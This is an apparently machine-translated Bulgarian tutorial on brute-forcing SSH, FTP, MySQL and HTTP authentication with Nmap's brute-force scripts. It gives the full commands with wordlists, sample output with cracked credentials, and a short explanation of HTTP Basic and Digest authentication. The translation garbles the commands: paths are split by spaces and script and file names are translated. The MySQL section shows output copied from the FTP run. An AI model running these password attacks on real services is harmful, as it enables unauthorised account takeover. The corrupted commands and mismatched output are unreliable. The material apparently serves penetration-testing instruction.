Nmap

Принуждаване към груба парола с помощта на Nmap

Принуждаване към груба парола с помощта на Nmap
За груба сила онлайн услуги, хората обикновено използват Hydra, Medusa и Metasploit Framework, но Nmap може да се използва и за груба сила на много онлайн услуги. Има вградени Nmap скриптове, които поддържат FTP, MySQL, SMTP, SNMP, SSH, Telnet, LDAP и други различни услуги. Можете също така да грубо форсирате HTTP базирани форми, основни и дайджест методи за удостоверяване. Ако имате инсталиран Nmap, можете да видите тези скриптове в директорията “/ usr / share / nmap / scripts”.

[имейл защитен]: ~ $ sudo apt update && sudo apt upgrade
[имейл защитен]: ~ $ sudo apt install nmap -y
[имейл защитен]: ~ $ cd / usr / share / nmap / scripts /
[имейл защитен]: ~ $ ls * brute *

В този урок ще проучим как можем да използваме Nmap за груба атака.

SSH Brute-Force

SSH е сигурен протокол за отдалечено администриране и поддържа удостоверяване, основано на openssl и парола. За грубо принудително SSH удостоверяване, базирано на парола, можем да използваме „ssh-brute.nse ”Nmap скрипт.

ubuntu @ ubuntu: / usr / share / nmap / script / $ ls * ssh * brute *
ssh-brute.nse

Предайте списъка с потребителско име и парола като аргумент на Nmap.

[имейл защитен]: ~ $ nmap --script ssh-brute -p22 192.168.43.181
--script-args userdb = потребители.txt, passdb = пароли.текст
Стартиране на Nmap 7.70 (https: // nmap.org) в 2020-02-08 17:09 PKT
Отчет за сканиране на Nmap за 192.168.43.181
Хостът е нагоре (0.Латентност 00033s).
ПРИСТАНИЩНА ДЪРЖАВНА УСЛУГА
22 / tcp отворен ssh
| ssh-brute:
| Сметки:
| admin: p4ssw0rd - Валидни идентификационни данни
| _ Статистика: Изпълнени 99 догадки за 60 секунди, средно tps: 1.7
Nmap done: 1 IP адрес (1 хост нагоре) сканиран през 60.17 секунди

FTP груба сила

FTP е протокол за прехвърляне на файлове, който поддържа удостоверяване въз основа на парола. За груба сила на FTP ще използваме „ftp-brute.nse ”Nmap скрипт.

ubuntu @ ubuntu: / usr / share / nmap / script / $ ls * ftp * brute *
ftp-груб.nse

Предайте списък с потребителско име и парола като аргумент на Nmap.

[имейл защитен]: ~ $ nmap --script ftp-brute -p21 192.168.43.181 - скрипт-аргументи
userdb = потребители.txt, passdb = пароли.текст
Стартиране на Nmap 7.70 (https: // nmap.org) в 2020-02-08 16:51 PKT
Отчет за сканиране на Nmap за 192.168.43.181
Хостът е нагоре (0.Латентност 00021s).
ПРИСТАНИЩНА ДЪРЖАВНА УСЛУГА
21 / tcp отворен ftp
| ftp-brute:
| Сметки:
| admin: p4ssw0rd - Валидни идентификационни данни
| _ Статистика: Изпълнени 99 догадки за 20 секунди, средно tps: 5.0
Nmap done: 1 IP адрес (1 хост нагоре) сканиран през 19.50 секунди

MYSQL Brute-Force

Понякога MySQL остава отворен за външни връзки и позволява на всеки да се свърже с него. Паролата му може да бъде взривена с помощта на Nmap със скрипт “mysql-brute”.

[имейл защитен]: ~ $ sudo nmap --script mysql-brute -p3306 192.168.43.181
--script-args userdb = потребители.txt, passdb = пароли.текст
Стартиране на Nmap 7.70 (https: // nmap.org) в 2020-02-08 16:51 PKT
Отчет за сканиране на Nmap за 192.168.43.181
Хостът е нагоре (0.Латентност 00021s).
ПРИСТАНИЩНА ДЪРЖАВНА УСЛУГА
3306 / tcp отворен mysql
| ftp-brute:
| Сметки:
| admin: p4ssw0rd - Валидни идентификационни данни
| _ Статистика: Изпълнени 99 догадки за 20 секунди, средно tps: 5.0
Nmap done: 1 IP адрес (1 хост нагоре) сканиран през 19.40 секунди

HTTP груба сила

HTTP използва три типа удостоверяване за удостоверяване на потребителите в уеб сървъри. Тези методологии се използват в рутери, модеми и усъвършенствани уеб приложения за обмен на потребителски имена и пароли. Тези видове са:

Основно удостоверяване

В основния протокол за удостоверяване на HTTP браузърът кодира потребителско име и парола с base64 и ги изпраща под заглавката „Authorization“. Можете да видите това на следващата екранна снимка.

Разрешение: Основен YWRtaW46YWRtaW4 =

Можете да base64 декодирате този низ, за ​​да видите потребителското име и паролата

[имейл защитен]: ~ $ echo YWRtaW46YWRtaW4 = | base64 -d
администратор: администратор

Основното удостоверяване на HTTP е несигурно, тъй като изпраща едновременно потребителско име и парола в обикновен текст. Всеки атакуващ човек в средата може лесно да прихване трафика и да декодира низа, за да получи паролата.

Дайджест удостоверяване

HTTP Digest Authentication използва хеширащи техники за криптиране на потребителското име и паролата, преди да ги изпрати на сървъра.

Hash1 = MD5 (потребителско име: царство: парола)
Hash2 = MD5 (метод: digestURI)
отговор = MD5 (Hash1: nonce: nonceCount: cnonce: qop: Hash2)

Можете да видите тези стойности под заглавието „Упълномощаване“.

Удостоверяването въз основа на дайджест е сигурно, защото паролата не се изпраща в обикновен текст. Ако нападател „Човек в средата“ прихване трафика, той няма да може да получи парола за обикновен текст.

Удостоверяване чрез формуляр

Основното и Digest удостоверяване поддържат само прехвърляне на потребителско име и парола, докато удостоверяването на базата на формуляр може да бъде персонализирано според нуждите на потребителя. Можете да създадете своя собствена уеб страница в HTML или JavaScript, за да приложите свои собствени техники за кодиране и прехвърляне.

Обикновено данните при удостоверяване чрез формуляр се изпращат в обикновен текст. По отношение на проблемите със сигурността трябва да се прилагат HTTP, за да се предотвратят атаки „човек в средата“.

Можем да използваме груба сила на всички видове HTTP удостоверяване с помощта на Nmap. За тази цел ще използваме скрипта „http-brute“.

ubuntu @ ubuntu: / usr / share / nmap / script / $ ls * http * brute *
http-грубо.nse

За да тестваме този Nmap скрипт, ще решим публично организирано предизвикателство за груба сила от академията на pentester на този URL адрес http: // pentesteracademylab.appspot.com / lab / webapp / basicauth.

Трябва да предоставим всичко, включително име на хост, URI, метод на заявка и речници поотделно като аргумент на скрипта.

[имейл защитен]: ~ $ sudo nmap -p80 --script http-brute pentesteracademylab.appspot.com
--script-args http-brute.име на хост = pentesteracademylab.appspot.com,
http-грубо.path = / lab / webapp / basicauth, userdb = потребители.txt, passdb = пароли.текст,
http-грубо.метод = POST
 
Стартиране на Nmap 7.70 (https: // nmap.org) в 2020-02-08 21:37 PKT
Отчет за сканиране на Nmap за пентестеракадемилаб.appspot.com (216.58.210.84)
Хостът е нагоре (0.20-годишна латентност).
Други адреси за pentesteracademylab.appspot.com (не сканирано): 2a00: 1450: 4018: 803 :: 2014
rDNS запис за 216.58.210.84: mct01s06-in-f84.1е100.нето
 
ПРИСТАНИЩНА ДЪРЖАВНА УСЛУГА
80 / tcp отворен http
| http-грубо:
| Сметки:
| admin: aaddd - Валидни идентификационни данни
| _ Статистика: Изпълнени 165 предположения за 29 секунди, средно tps: 5.3
Nmap done: 1 IP адрес (1 хост нагоре) сканиран в 31.22 секунди

Заключение

Nmap може да се използва за много неща, въпреки простото сканиране на портове. Той може да замени Metasploit, Hydra, Medusa и много други инструменти, създадени специално за онлайн грубо форсиране. Nmap има прости, лесни за използване вградени скриптове, които грубо прилагат почти всяка услуга, включително HTTP, TELNEL, SSH, MySQL, Samba и други.

Как да инсталирате League Of Legends на Ubuntu 14.04
Ако сте фен на League of Legends, това е възможност за вас да тествате League of Legends. Имайте предвид, че LOL се поддържа на PlayOnLinux, ако сте п...
Инсталирайте най-новата стратегия за игра OpenRA на Ubuntu Linux
OpenRA е Libre / Free Real Time стратегия за игра, която пресъздава ранните игри на Westwood като класическата Command & Conquer: Red Alert. Разпредел...
Инсталирайте най-новия Dolphin Emulator за Gamecube & Wii на Linux
Dolphin Emulator ви позволява да играете избраните от вас игри Gamecube & Wii на Linux Personal Computers (PC). Като безплатно достъпен и емулатор на...